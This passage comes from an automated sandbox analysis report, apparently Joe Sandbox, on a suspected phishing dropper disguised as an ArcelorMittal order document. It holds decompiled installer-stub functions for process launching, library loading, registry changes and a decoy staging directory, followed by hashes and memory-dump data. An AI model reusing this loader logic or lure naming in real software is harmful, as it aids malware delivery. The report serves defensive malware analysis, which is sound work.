						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x28)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406032(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis\\Grusendes\\Stoser\\Unappealingness\\Dermobranchiate",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015b9
0x004015c1
0x004015c4
0x004015c9
0x004015cd
0x004015cf
0x004015d7
0x004015d9
0x004015dc
0x004015e2
0x004015fc
0x004015ff
0x004015e4
0x004015e4
0x004015e7
0x00000000
0x004015f2
0x004015f5
0x004015f5
0x004015e7
0x00401606
0x0040160d
0x0040161c
0x0040161c
0x0040160f
0x00401612
0x0040161a
0x00000000
0x00000000
0x0040161a
0x0040160d
0x0040161f
0x00401623
0x00401624
0x004015cf
0x0040162c
0x0040165b
0x004021dc
0x0040162e
0x00401630
0x0040163d
0x00401645
0x0040164d
0x00401653
0x00401653
0x0040164d
0x00402a4f
0x00402a5b

APIs

Part of subcall function 00405A91: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nspD224.tmp,0040A300,00405B05,C:\Users\user\AppData\Local\Temp\nspD224.tmp,C:\Users\user\AppData\Local\Temp\nspD224.tmp, 4.v,?,C:\Users\user\AppData\Local\Temp\,00405843,?,762E3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"), ref: 00405A9F
Part of subcall function 00405A91: CharNextW.USER32(00000000), ref: 00405AA4
Part of subcall function 00405A91: CharNextW.USER32(00000000), ref: 00405ABC

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612

Part of subcall function 00405660: CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056A3

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate,?,00000000,000000F0), ref: 00401645

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate, xrefs: 00401638

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate
API String ID: 1892508949-2207273832
Opcode ID: 6a1f85d338ebb5bb54d8052e3a08a01253941d961bae5fb58311d3ff7cefe74a
Instruction ID: 415897e78b6bad03a127c6f6368a694d7e54beaaa1ae65b52f31c6ed2c47f3e3
Opcode Fuzzy Hash: 6a1f85d338ebb5bb54d8052e3a08a01253941d961bae5fb58311d3ff7cefe74a
Instruction Fuzzy Hash: 8C11E631504514ABCF20BFA4CD4099E36B1EF44364B24093BEA05B62F1DA3E4E819F5D

Uniqueness

Uniqueness Score: -1.00%

Function 00405712 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405712(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x7a4f48->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x7a4f48,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x0040571b
0x0040573b
0x00405743
0x00405748
0x00000000
0x0040574e
0x00405752

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F48,Error launching installer), ref: 0040573B
CloseHandle.KERNEL32(0040A300), ref: 00405748

Strings

Error launching installer, xrefs: 00405725

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 3637be9cb8c8c178a0f5493f73af728e1da129e746f7561b800f2829df1c9c8b
Instruction ID: 7a3daaf9c9c1dfce14d3e2680162b4324113c6786a0a66257257a350a584d1d9
Opcode Fuzzy Hash: 3637be9cb8c8c178a0f5493f73af728e1da129e746f7561b800f2829df1c9c8b
Instruction Fuzzy Hash: 67E046F4600209BFEB10AB60ED49F7B7BACEB44204F008420BE50F2190DAB8D8108A78

Uniqueness

Uniqueness Score: -1.00%

Function 00401FC3 Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00401FC3(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				void* _t34;
				WCHAR* _t37;
				intOrPtr* _t38;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x7a8af8");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x7a8ac8 =  *0x7a8ac8 +  *(_t39 - 4);
					return 0;
				}
				_t37 = E00402BBF(0xfffffff0);
				 *((intOrPtr*)(_t39 - 8)) = E00402BBF(1);
				if( *((intOrPtr*)(_t39 - 0x1c)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t38 = E00406477( *(_t39 + 8),  *((intOrPtr*)(_t39 - 8)));
					if(_t38 == _t32) {
						E00405191(0xfffffff7,  *((intOrPtr*)(_t39 - 8)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x24)) == _t32) {
							 *_t38( *((intOrPtr*)(_t39 - 0xc)), 0x400, _t34, 0x40cdcc, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x24)));
							if( *_t38() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x20)) == _t32 && E0040381B( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8)); // executed
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t37); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x00401fc3
0x00401fc3
0x00401fc8
0x00401fcf
0x0040208e
0x004021dc
0x004021dc
0x00402a4c
0x00402a4f
0x00402a5b
0x00402a5b
0x00401fde
0x00401fe8
0x00401feb
0x00401ffb
0x00401fff
0x00402007
0x0040200a
0x00402087
0x00000000
0x00402087
0x0040200c
0x00402017
0x0040201b
0x0040205b
0x0040201d
0x00402020
0x00402023
0x0040204f
0x00402025
0x00402028
0x00402031
0x00402033
0x00402033
0x00402031
0x00402023
0x00402063
0x0040207c
0x0040207c
0x00000000
0x00402063
0x00401fee
0x00401ff6
0x00401ff9
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE

Part of subcall function 00405191: lstrlenW.KERNEL32(007A0F20,00000000,007924F8,762E23A0,?,?,?,?,?,?,?,?,?,00403168,00000000,?), ref: 004051C9
Part of subcall function 00405191: lstrlenW.KERNEL32(00403168,007A0F20,00000000,007924F8,762E23A0,?,?,?,?,?,?,?,?,?,00403168,00000000), ref: 004051D9
Part of subcall function 00405191: lstrcatW.KERNEL32(007A0F20,00403168), ref: 004051EC
Part of subcall function 00405191: SetWindowTextW.USER32(007A0F20,007A0F20), ref: 004051FE
Part of subcall function 00405191: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405224
Part of subcall function 00405191: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523E
Part of subcall function 00405191: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524C

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 0040207C

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: cb89a4fd28b95848d33a1bfc1764e9066b0be27e0c87ae0b066b9e15343262a0
Instruction ID: f6a722eb4006bf24fd89555576c47c1226d97d21954259867b0b9a1495a6a6e6
Opcode Fuzzy Hash: cb89a4fd28b95848d33a1bfc1764e9066b0be27e0c87ae0b066b9e15343262a0
Instruction Fuzzy Hash: 6F219531900209EBCF20AFA5CE48A9E7E71BF00354F20427BF510B51E1CBBD8A81DA5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040249E Relevance: 4.5, APIs: 3, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040249E(int* __ebx, short* __esi) {
				void* _t7;
				int _t8;
				long _t11;
				int* _t14;
				void* _t18;
				short* _t20;
				void* _t22;
				void* _t25;

				_t20 = __esi;
				_t14 = __ebx;
				_t7 = E00402CC9(_t25, 0x20019); // executed
				_t18 = _t7;
				_t8 = E00402BA2(3);
				 *__esi = __ebx;
				if(_t18 == __ebx) {
					L7:
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					 *(_t22 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t22 - 0x1c)) == __ebx) {
						_t11 = RegEnumValueW(_t18, _t8, __esi, _t22 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t11;
						if(_t11 != 0) {
							goto L7;
						} else {
							goto L4;
						}
					} else {
						RegEnumKeyW(_t18, _t8, __esi, 0x3ff);
						L4:
						_t20[0x3ff] = _t14;
						_push(_t18);
						RegCloseKey();
					}
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

0x0040249e
0x0040249e
0x004024a3
0x004024aa
0x004024ac
0x004024b3
0x004024b6
0x0040281e
0x0040281e
0x004024bc
0x004024c4
0x004024c7
0x004024e0
0x004024e6
0x004024e8
0x00000000
0x00000000
0x00000000
0x00000000
0x004024c9
0x004024cd
0x004024ee
0x004024ee
0x004024f5
0x004024f6
0x004024f6
0x004024c7
0x00402a4f
0x00402a5b

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000160,00000000,00000022,00000000,?,?,?,0040232B,00000002), ref: 00402CF1

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003,00020019), ref: 004024E0
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nspD224.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 9265ab6f625e07d86975ae9e6924e5a372e872d8d6f540d845591db09282f072
Instruction ID: b3b69fb6c0ab9d70611345d1cc2aadb4deec7d6fa7b8fc5cea9b38d3f519ee44
Opcode Fuzzy Hash: 9265ab6f625e07d86975ae9e6924e5a372e872d8d6f540d845591db09282f072
Instruction Fuzzy Hash: 38F08171A00204ABEB209FA5DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69

Uniqueness

Uniqueness Score: -1.00%

Function 100028A4 Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00000000), ref: 10002963
GetLastError.KERNEL32 ref: 10002A6A

Memory Dump Source

Source File: 00000001.00000002.63200218360.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.63200192081.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.63200243775.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.63200269821.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x7a8a70;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x7a7a2c =  *0x7a7a2c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x7a7a2c, 0x7530,  *0x7a7a14), 0); // executed
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 564535d36588263e3f9deefe94a200e845c26c7dee2e47344d25cef9fda2a614
Instruction ID: 4d11fbcb8758acff49efb51301ce17a4c0d3f2729c831b224df7ca8d4f3fd522
Opcode Fuzzy Hash: 564535d36588263e3f9deefe94a200e845c26c7dee2e47344d25cef9fda2a614
Instruction Fuzzy Hash: 0D01F432624210ABE7095B389D04B6A3698E755314F10C53FF851F66F1DA78CC02DB4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040231F Relevance: 3.0, APIs: 2, Instructions: 40
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040231F(void* __ebx) {
				short* _t6;
				long _t8;
				void* _t11;
				void* _t15;
				long _t19;
				void* _t22;
				void* _t23;

				_t15 = __ebx;
				_t26 =  *(_t23 - 0x1c) - __ebx;
				if( *(_t23 - 0x1c) != __ebx) {
					_t6 = E00402BBF(0x22);
					_t18 =  *(_t23 - 0x1c) & 0x00000002;
					__eflags =  *(_t23 - 0x1c) & 0x00000002;
					_t8 = E00402BFF(E00402CB4( *((intOrPtr*)(_t23 - 0x28))), _t6, _t18); // executed
					_t19 = _t8;
					goto L4;
				} else {
					_t11 = E00402CC9(_t26, 2); // executed
					_t22 = _t11;
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t19 = RegDeleteValueW(_t22, E00402BBF(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t19 != _t15) {
							goto L6;
						}
					}
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}

0x0040231f
0x0040231f
0x00402322
0x00402351
0x00402359
0x00402359
0x00402367
0x0040236c
0x00000000
0x00402324
0x00402326
0x0040232b
0x0040232f
0x0040281e
0x0040281e
0x00402335
0x00402345
0x00402347
0x0040236e
0x00402370
0x00000000
0x00402376
0x00402370
0x0040232f
0x00402a4f
0x00402a5b

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000160,00000000,00000022,00000000,?,?,?,0040232B,00000002), ref: 00402CF1

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033,00000002), ref: 0040233E
RegCloseKey.ADVAPI32(00000000), ref: 00402347

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: 77460bd49ef5699d8326dfc913d723684c59f90a6791b38fbb55a59eac76fc56
Instruction ID: 84b37c2a738164438e1dccf168bab5f9c0075825efa18c6fe23cdbeb1825a049
Opcode Fuzzy Hash: 77460bd49ef5699d8326dfc913d723684c59f90a6791b38fbb55a59eac76fc56
Instruction Fuzzy Hash: 03F04F72A04110ABEB11BFF59B4EABE7269AB80314F15803BF501B71D5D9FC99015629

Uniqueness

Uniqueness Score: -1.00%

Function 0040156B Relevance: 3.0, APIs: 2, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040156B(void* __ebx) {
				int _t4;
				void* _t9;
				struct HWND__* _t11;
				struct HWND__* _t12;
				void* _t16;

				_t9 = __ebx;
				_t11 =  *0x7a7a10; // 0x0
				if(_t11 != __ebx) {
					ShowWindow(_t11,  *(_t16 - 0x28));
					_t4 =  *(_t16 - 0x2c);
				}
				_t12 =  *0x7a7a24; // 0x10442
				if(_t12 != _t9) {
					ShowWindow(_t12, _t4); // executed
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t16 - 4));
				return 0;
			}

0x0040156b
0x0040156b
0x00401579
0x0040157f
0x00401581
0x00401581
0x00401584
0x0040158c
0x00401594
0x00401594
0x00402a4f
0x00402a5b

APIs

ShowWindow.USER32(00000000,?), ref: 0040157F
ShowWindow.USER32(00010442), ref: 00401594

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
